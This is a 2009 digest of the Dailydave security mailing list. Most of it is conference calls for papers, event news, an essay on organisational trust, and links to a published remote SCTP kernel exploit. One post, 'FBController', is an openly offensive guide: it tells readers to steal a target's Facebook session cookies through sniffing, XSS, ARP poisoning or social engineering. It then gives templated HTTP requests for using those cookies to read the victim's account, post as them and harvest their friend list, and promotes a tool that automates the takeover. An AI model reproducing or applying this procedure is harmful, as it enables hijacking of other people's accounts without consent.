Hash: SHA1

For those of you in London or nearby, I hear that Immunity's very own
Rich Smith will be at 4420 (and InfoSec, and that secret con, etc.) this
month, and you can pester him with all of your CANVAS questions, or ask
him what American food is like and why the beer comes in a "tower".

http://dc4420.org/site/index.php?topic=92.msg233#msg233

Likewise, he'll also be speaking at CONFidence in Krakow, Poland, for
your VNC'ing pleasure. Probably the one line out of his talk that I
think people miss, is that the goal of some of these tools (i.e. any
automated scanner worth its salt) "is to turn the expensive part of
attacking into bandwidth and network connectivity. "

Although there is, certainly, an expense associated with "What do I do
with all these shells, now that I have them". Perhaps next month Nico's
Face Recognition[1] module will be integrated and we can answer that one
too. :>

Thanks,
Dave Aitel
Immunity, Inc.
[1] http://twitter.com/nicowaisman
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkn12/4ACgkQtehAhL0gheqF6QCdGrJg/spqQcC/kRLNDJV1YKDd
wlsAoIRI72xloJKNH5zqlQnocjjWziqN
=CTK2
-----END PGP SIGNATURE-----

From sgrakkyu at openssl.it  Mon Apr 27 21:49:37 2009
From: sgrakkyu at openssl.it (sgrakkyu)
Date: Tue, 28 Apr 2009 03:49:37 +0200
Subject: [Dailydave] Remote kernel bug in SCTP?
In-Reply-To: <49BA9D9C.7090606@immunityinc.com>
References: <49BA9D9C.7090606@immunityinc.com>
Message-ID: <49F660B1.3000302@openssl.it>

dave wrote:
> Did everyone else already know about this bug? So you connect to an SCTP
> endpoint, then send a packet to overwrite arbitrary kernel data? That'd
> be cool.
> 
> This is where Phillipe tells us about his scanner from 2002. :>
> 
> -dave
> 

Hi everybody, I saw some stream of mails wondering about this SCTP
issue: some sayin' it's a D.o.S., some other thinking about a local
exploit.
It started as a challenge and it ended up as a lot of fun and a reliable
one-shot remote exploit for Linux SLUB/SLABs

Here you go the link: http://sgrakkyu.antifork.org/sctp_houdini.c
(it covers x86-64 kernels only)

and here you go a small blog post I made for it:
http://kernelbof.blogspot.com
More details might be added, if someone is interested.
Hope you'll have at least half of the fun I had in developing it:)

Cheers,

  -sgrakkyu

From mark.bristow at owasp.org  Mon Apr 27 23:19:22 2009
From: mark.bristow at owasp.org (Mark Bristow)
Date: Mon, 27 Apr 2009 22:19:22 -0500
Subject: [Dailydave] OWASP AppSec DC 2009 CALL FOR PAPERS
Message-ID: <49F675BA.20403@owasp.org>

Colleagues,

OWASP is currently soliciting papers for the OWASP AppSec DC 2009
Conference that will take place at the Walter E. Washington Convention
Center in Washington, DC on November 10th through 13th of 2009.  There
will be training courses on November 10th and 11th followed by plenary
sessions on the 12th and 13th with each day having at least three
tracks. AppSec DC may also have BOF, break out, or speed talks in
addition to the standard schedule depending on the submissions we receive.

We are seeking people and organizations that want to present on any of
the following topics (in no particular order):
 - Business Risks with Application Security.
 - Starting and Managing Secure Development Lifecycle Programs.
 - Web Services-, XML- and Application Security.
 - Metrics for Application Security.
 - Application Threat Modeling.
 - Hands-on Source Code Review.
 - Web Application Security Testing.
 - OWASP Tools and Projects.
 - Secure Coding Practices (J2EE/.NET).
 - Privacy Concerns with Applications and Data Storage
 - Web Application Security countermeasures
 - Technology specific presentations on security such as AJAX, XML, etc.
 - Anything else relating to OWASP and Application Security.

To make a submission you must include :
 - Presenter(s) name(s)
 - Presenter(s) Email and/or Phone number(s)
 - Presenter(s) bio(s)
 - Title
 - Abstract
 - Any supporting research/tools (will not be released outside of CFP
committee)

Submission deadline is June 15th 2009 at 11:59 PM Eastern Standard
Time.  Submit Proposals To mark.bristow(at)owasp.org with the subject
line "APPSEC DC CFP SUBMISSION" (an automated filter is used). 
Additional information can be found in the FAQ.

Conference Website: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
FAQ: https://www.owasp.org/index.php/OWASP_AppSec_DC_2009_-_FAQ
CFP w/ FAQ: http://www.owasp.org/images/6/65/AppSec_DC_2009_CFP.pdf

Please forward to all interested practitioners and colleagues.

Regards,

-- 
Mark Bristow

AppSec DC 09 - https://www.owasp.org/index.php/OWASP_AppSec_DC_2009
OWASP DC Chapter Co-Chair - http://www.owasp.org/index.php/Washington_DC
OWASP GCC - https://www.owasp.org/index.php/Global_Conferences_Committee



From tomi.tuominen at iki.fi  Tue Apr 28 04:41:03 2009
From: tomi.tuominen at iki.fi (Tomi Tuominen)
Date: Tue, 28 Apr 2009 11:41:03 +0300
Subject: [Dailydave] T2'09: Call for Papers 2009 (Helsinki / Finland)
Message-ID: <49F6C11F.9080906@iki.fi>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                ### T2'09 - Call For Papers ###
                      Helsinki, Finland
                    29 - 30 October 2009

We are pleased to announce the annual T2?09 conference, which will take
place in Helsinki, Finland, from October 29 to 30, 2009.

We are looking for original technical presentations in the fields of
information security. Presentations should last a minimum of 60 minutes
and a maximum of two hours and be presented in English.

We will be accepting talk proposals until July 1, 2009. All submitted
presentations will be reviewed by the T2 Advisory Board.

As usual selected speakers will be reimbursed for travel and hotel
costs. We proud ourselves of taking good care of the speakers and there
is always something going on during the evenings :)

We suggest strongly that you submit earlier rather than later, since we
will close the CFP early once we receive enough quality submissions to
fill the slots.

Please include the following with your submission:

   1. Presenter, and geographical location (country of origin/passport)
   2. Contact information (email, cell phone and postal address)
   3. Brief biography (including employer and/or affiliations)
   4. Motivations for presentation (500 words max)
   5. Presentation abstract (500 words max)
   6. If your presentation references a paper or piece of software that
      you have published, please provide us with either a copy of the
      said paper or software, or an URL where we can obtain it.
   7. List any other publications or conferences where this material
      has been or will be published/submitted

Please send the above information to cfp-2009 (at) lista.t2.fi

===

For more information:
http://www.t2.fi/

Links to past schedules:
http://www.t2.fi/schedules/

What speakers are saying:
http://radian.org/notebook/van-helsingfors

What attendees are saying:
http://www.northern-monkee.co.uk/pub/news/Entries/2008/10/19_T2_08_.fi.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkn2wR4ACgkQizO45EruiTWGCQCgtpdQU4Ccza/iy18upKTnDbVe
M+8AoNtm/RTirv936YtYhElKz4xv9vsw
=XypD
-----END PGP SIGNATURE-----

From 0xjbrown41 at gmail.com  Tue Apr 28 11:52:09 2009
From: 0xjbrown41 at gmail.com (Jeremy Brown)
Date: Tue, 28 Apr 2009 11:52:09 -0400
Subject: [Dailydave] Remote kernel bug in SCTP?
In-Reply-To: <49F660B1.3000302@openssl.it>
References: <49BA9D9C.7090606@immunityinc.com> <49F660B1.3000302@openssl.it>
Message-ID: <c83481820904280852v7cfb393ft37e571017616a232@mail.gmail.com>

I love the amount of research you put into this, challenges can be fun
and quite beneficial as we all know. Although the world just tilted
slightly, great work =)

On Mon, Apr 27, 2009 at 9:49 PM, sgrakkyu <sgrakkyu at openssl.it> wrote:
> dave wrote:
>> Did everyone else already know about this bug? So you connect to an SCTP
>> endpoint, then send a packet to overwrite arbitrary kernel data? That'd
>> be cool.
>>
>> This is where Phillipe tells us about his scanner from 2002. :>
>>
>> -dave
>>
>
> Hi everybody, I saw some stream of mails wondering about this SCTP
> issue: some sayin' it's a D.o.S., some other thinking about a local
> exploit.
> It started as a challenge and it ended up as a lot of fun and a reliable
> one-shot remote exploit for Linux SLUB/SLABs
>
> Here you go the link: http://sgrakkyu.antifork.org/sctp_houdini.c
> (it covers x86-64 kernels only)
>
> and here you go a small blog post I made for it:
> http://kernelbof.blogspot.com
> More details might be added, if someone is interested.
> Hope you'll have at least half of the fun I had in developing it:)
>
> Cheers,
>
> ?-sgrakkyu
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

From dave at immunityinc.com  Wed Apr 29 11:05:03 2009
From: dave at immunityinc.com (dave)
Date: Wed, 29 Apr 2009 11:05:03 -0400
Subject: [Dailydave] Trust is a fractal
Message-ID: <49F86C9F.5010905@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

One thing I always like to watch is how organizations struggle with
trust - typically in two ways:

1. They assume data can be "classified", but then fall down when trying
to figure out how to classify A or B when unclassified datas A and B can
be combined to deduce classified data C. This is great for when Anti
Data Leakage vendors are trying to solve any problem greater than "My
source code is being emailed out via GMail".

2. They apply single sign on to web applications. It's basically
impossible to secure Sharepoint once people decide they want single sign
on. So those are easy and fun gigs for the whole family! Sharepoint's
not easy to secure under the best of situations (hello blacklists!), but
add single sign on to it and you get entire new realms of insecurity.

In the end, for any level of scale, you always end up with "I don't even
know who I trust". This is not a comfortable place for a CSO to be in.

- -dave
Is it too early in the morning for kerberos jokes? :>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkn4bJ8ACgkQtehAhL0gheqcdACffbOA/wLosfUz2zkl5VZP8NDI
2NAAn2pHFep8TqPDnjl08o5Da11Kdllo
=IDqc
-----END PGP SIGNATURE-----

From dan at geer.org  Wed Apr 29 11:34:58 2009
From: dan at geer.org (dan at geer.org)
Date: Wed, 29 Apr 2009 11:34:58 -0400
Subject: [Dailydave] MetriCon 4.0
Message-ID: <20090429153458.7F69B341D1@absinthe.tinho.net>


On behalf of the program committee, may I please direct
your attention to your possible participation MetriCon 4.0.

The MetriCon 4.0 Workshop will be held on Tuesday, August 11,
2009, in Montreal, Quebec, co-located with the USENIX Security
Symposium. All who are interested in participating should
review the formal Call for Participation and, as it says, soon
communicate via email to the MetriCon 4.0 program committee.
As with all MetriCon events, MetriCon 4.0 is by invitation
with both invitations for attendance-only and for attendance
with presentation possible. Please be in touch. The theme of
this episode is The Importance of Context.  This workshop
series is intense, and is focused on progress rather than
claims of first discovery.  See

http://securitymetrics.org/content/Wiki.jsp?page=Metricon4.0


Dan Geer


From dave at immunityinc.com  Wed Apr 29 12:17:19 2009
From: dave at immunityinc.com (dave)
Date: Wed, 29 Apr 2009 12:17:19 -0400
Subject: [Dailydave] JBIG video
Message-ID: <49F87D8F.4090402@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This video is quite good and there's Adobe Reader 0day and everything!
It's the story of the JBIG vulnerability, and how the VRT dealt with it,
along with an embarassing timeline.

http://www.dojosec.com/?p=92
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkn4fY8ACgkQtehAhL0gherxRgCfR2ChpHX60ukrAmQ78s9Kub1L
XgcAnRcxIW+pu/Sub4VdM9hnw9dyWtfQ
=m2kN
-----END PGP SIGNATURE-----

From frankruder at hotmail.com  Wed Apr 29 21:00:28 2009
From: frankruder at hotmail.com (cocoruder.)
Date: Thu, 30 Apr 2009 01:00:28 +0000
Subject: [Dailydave] JBIG video
In-Reply-To: <49F87D8F.4090402@immunityinc.com>
References: <49F87D8F.4090402@immunityinc.com>
Message-ID: <SNT109-W394B117ECA279B4657901FCB6C0@phx.gbl>


There is also a zero-day vulnerability (not the Adobe Reader one) in it, does anyone note it? dig it in carefully:)
 

Regards,
cocoruder, welcome to my blog: http://ruder.cdut.net
> Date: Wed, 29 Apr 2009 12:17:19 -0400
> From: dave at immunityinc.com
> To: dailydave at lists.immunityinc.com
> Subject: [Dailydave] JBIG video
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> This video is quite good and there's Adobe Reader 0day and everything!
> It's the story of the JBIG vulnerability, and how the VRT dealt with it,
> along with an embarassing timeline.
> 
> http://www.dojosec.com/?p=92
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org
> 
> iEYEARECAAYFAkn4fY8ACgkQtehAhL0gherxRgCfR2ChpHX60ukrAmQ78s9Kub1L
> XgcAnRcxIW+pu/Sub4VdM9hnw9dyWtfQ
> =m2kN
> -----END PGP SIGNATURE-----
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
_________________________________________________________________
????????????MClub?????????
http://club.msn.cn/?from=10

From hl2009 at hack.lu  Thu Apr 30 08:40:06 2009
From: hl2009 at hack.lu (hack.lu 2009 info)
Date: Thu, 30 Apr 2009 14:40:06 +0200
Subject: [Dailydave] Call for Papers Hack.lu 2009
Message-ID: <49F99C26.8000601@hack.lu>

Call for Papers Hack.lu 2009
============================

The purpose of the hack.lu convention is to give an open and free
playground where people can discuss the implication of new technologies
in society. hack.lu is a balanced mix convention where technical and
non-technical people can meet each other and share freely all kind of
information. The convention will be held in the Grand-Duchy of
Luxembourg in October 2009 (28-30.10.2008). The conference is three days
of active discussions, presentations and workshops for sharing
experience around new attacks, defensive techniques and information
security (including funky experiments). We would like to announce the
opportunity to submit papers, and/or lightning talk proposals for
selection by the hack.lu technical review committee. This year we will
be doing one hour talks, and some shorter talk sessions.


Scope:
------

Topics of interest include, but are not limited to:
- Software Engineering and Security
- Honeypots/Honeynets
- Spyware, Phishing and Botnets (Distributed attacks)
- Newly discovered vulnerabilities in software and hardware
- Electronic/Digital Privacy
- Wireless Network and Security
- Attacks on Information Systems and/or Digital Information Storage
- Electronic Voting
- Free Software and Security
- Assessment of Computer, Electronic Devices and Information Systems
- Standards for Information Security
- Legal and Social Aspect of Information Security
- Software Engineering and Security
- Security in Information Retrieval
- Network security
- Forensics and Anti-Forensics
- Mobile communications security and vulnerabilities


Deadlines:
----------

The following dates are important if you want to participate in the CfP

Abstract submission: no later than 15 June 2009
Full paper submission: no later than 1st August 2009
Notification date: mid/end of August


Submission guideline:
---------------------

Authors should submit a paper in English up to 5.000 words, using a
non-proprietary and open electronic format. The program committee will
review all papers and the author of each paper will be notified of the
result, by electronic means. Abstract is up to 400 words. Submissions
must be sent using the following interface: http://2009.hack.lu/papers/

Submissions should also include the following:
1. Presenter, and geographical location (country of origin/passport)and
contact info.
2. Employer and/or affiliations.
3. Brief biography, list of publications or papers.
4. Any significant presentation and/or educational experience/background.
5. Reason why this material is innovative or significant or an important
tutorial.
6. Optionally, any samples of prepared material or outlines ready.
7. Information about if yes or no the submission has already been
presented and where.

The information will be used only for the sole purpose of the hack.lu
convention including the information on the public website. If you want
to remain anonymous, you have the right to use a nickname.


Speakers' Privileges:
---------------------

- Accommodation will be provided (3 nights).
- Travel expenses will be covered up to a max amount.
- Conference speakers night.


Publication and rights:
-----------------------

Authors keep the full rights on their publication/papers but give an
unrestricted right to redistribute their papers for the hack.lu
convention and its related electronic/paper publication.


Sponsoring:
-----------

If you want to support the initiative and gain visibility by sponsoring,
please contact us by writing an e-mail to info(AT)hack.lu


Web site and wiki:
------------------

http://2009.hack.lu/


From quakerdoomer at inbox.lv  Thu Apr 30 16:31:35 2009
From: quakerdoomer at inbox.lv (QUAKER DOOMER)
Date: Thu, 30 Apr 2009 23:31:35 +0300
Subject: [Dailydave] FBController - (Facebook Control Utility) version 1.0
Message-ID: <1241123495.49fa0aa7e635b@mail.inbox.lv>

FBController - The Ultimate Utility to Control Facebook accounts without the 
Password.

Let me clear that this utility WON'T  hack/crack Facebook accounts.
The utility will need biscuits/cookies instead of the password.

Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, 
scroogle search, anyhow !
Once you have the cookies you can use FBController and have Full control over the 
target's Facebook account.

==============================================================
Login to your Facebook account and sniff your cookie OR collect a few live Facebook 
Biscuit/s of your Target/s.

1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than 
FaceBook.COM's current SYSTIME.


2 ] Send a GET Request to www.facebook.com port 80 after calculating the required 
variables (below)
[code]
GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
[/code]


3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other 
Post Request

Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other 
Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post 
Request

Your login_x actually looks like
a:2:{s:5:"email";s:13:"you at youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.


4 ] Send a GET Request like below with the above calculated variables :
[code]
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-
CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-
STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-
FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 
HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F
%2Fwww.facebook.com%2Fhome.php
[/code]

5 ] In the output :
Search for  Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)


6 ] Generate a new POST Request with the above calculated new variables :
[code]
POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-
HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A
%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-
ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-
STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-
FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-
RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-
CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-
FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-
EXPLAINED-In-POINT-3)375
[/code]


7 ] Use the above variables to view any content with the appropriate GET / requests


8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)


Looks like loads of HardWork ha ?
If you don't want to do all this manually, then you can download this TooL named 
FBController (FACEBOOK CONTROLLER)  written
by me. 
Till now FBController version 1.0 uses your Target's provided cookie and only :

A > Downloads the HomePage.
B > Allows you to Update the Target's Wall and
C > Retrieve your Target's Friend's List

There are many APIs available to write apps and 3rd party Tools for FB in Java, 
Perl, .NET, etc.

FBConTroller was entirely written without knowing any of Facebook's Dev API's.
Considering the above alongwith Facebook's complexity, the next version might take 
some time to get released

Many more features to come in version 2.0

A 26th April Release !
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 
2009.

Happy Controlling ! :-)
==============================================================

Download : http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-facebook-
controller-the-ultimate-facebook-controller-without-the-pa

The Latest available release is FBCONTROLLER version 1.0
Coded by : Azim Poonawala (QUAKERDOOMER)
Author's website : http://solidmecca.co.nr

Regards,
QUAKERDOOMER


From jmoss at blackhat.com  Thu Apr 30 19:29:27 2009
From: jmoss at blackhat.com (jmoss)
Date: Thu, 30 Apr 2009 16:29:27 -0700
Subject: [Dailydave] BH USA CFP closing next Tuesday
Message-ID: <088501c9c9eb$814a5680$83df0380$@com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Hey guys, just a reminder that the CFP for Black Hat USA is closing next Tuesday.

I'll post the first batch of acceptances next week.. some really solid stuff this year from hacking ATM machines and lock picking forensics to Injecting agents into VM guest OS and myths of Extended Validation SSL certificates.

Jeff




-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.9.1 (Build 287)
Charset: UTF-8

wsBVAwUBSfo0WUqsDNqTZ/G1AQhyWwf7B/94B34C9kdZRRZAgWYgDIVDARUv6K51
/lzzBWrXWefzTCO8B4XVarlzPZJL61QHeCVuZ1XbzW+r3If4YdYz2vGjcepHQqRB
UQp/nWn8Cnomt/6IsczIVAwxv5fdSNZ7EJGDBE6v4XP0sTZS8yTE10ecSSKKF2Cf
99xBDXjxtpQHTvgQRlj3ygI/hV1hSuASJf74AIX904BQ1DN6uprpEXWUGFhUS1pB
6fYC3BuTt5YfRho+f2P8gR1z9aSyYkyrIReH8BvWMwFWefJUSDu4h8D6/qiVTrFg
H/o9EN4xJN1OFXmT59zWzjXVRY3eLXOwdGfpeDB8x9sdqT5ujCPcVw==
=XzFG
-----END PGP SIGNATURE-----